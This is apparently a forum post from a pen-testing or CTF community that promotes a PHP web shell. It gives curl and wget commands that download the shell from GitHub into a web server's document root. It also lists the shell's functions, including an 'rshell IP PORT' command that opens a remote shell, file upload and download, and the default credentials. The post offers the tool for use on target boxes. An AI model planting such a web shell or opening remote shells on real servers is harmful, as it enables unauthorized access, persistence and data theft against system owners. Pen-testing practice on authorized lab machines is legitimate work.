Sooo, I am getting a bit exhausted with people’s reverse shells crashing boxes (also shuffling through them to find one that works). Here is a nice web shell that gives you a terminal like page to execute basic commands from. It’s not a TRUE reverse shell but it is good enough for most of the things you will do here at least. Enjoy,
A simple, intuitive, feature rich, php web shell for pen testing.
To download use one of the following (or similar)
curl https://github.com/eb3095/php-shell/raw/master/php-shell.php > /var/www/html/php-shell.php
wget https://github.com/eb3095/php-shell/raw/master/php-shell.php -O /var/www/html
From there just visit the website with /php-shell.php at the end and enjoy your web based shell from the host!
- Arrow Up: History up
- Arrow Down: History down
- Enter: Run command
- Click Anywhere: Focus command prompt
History is not saved across sessions and is stored locally in the browser for the time being.
- exit: Log out
- cd: Change directory
- cls: Clear the screen
- rshell: “rshell IP PORT” open a remote shell to the specified address
- upload: Shows a file prompt then uploads the file to the current directory
- download: Download a file either relative path or full. “download FILE”
cd is unique here. If you do the following,
cd /home; ls
This will be executed as a SH/BASH command. The cd will not set the current working directory outside of the exec. However,
This will be executed as an internal command setting the PHP cwd and it is permanent (until refresh).
The defaults are,
- Username: user
- Password: pass
The username and password are both hashed via sha512 and set in the file directly.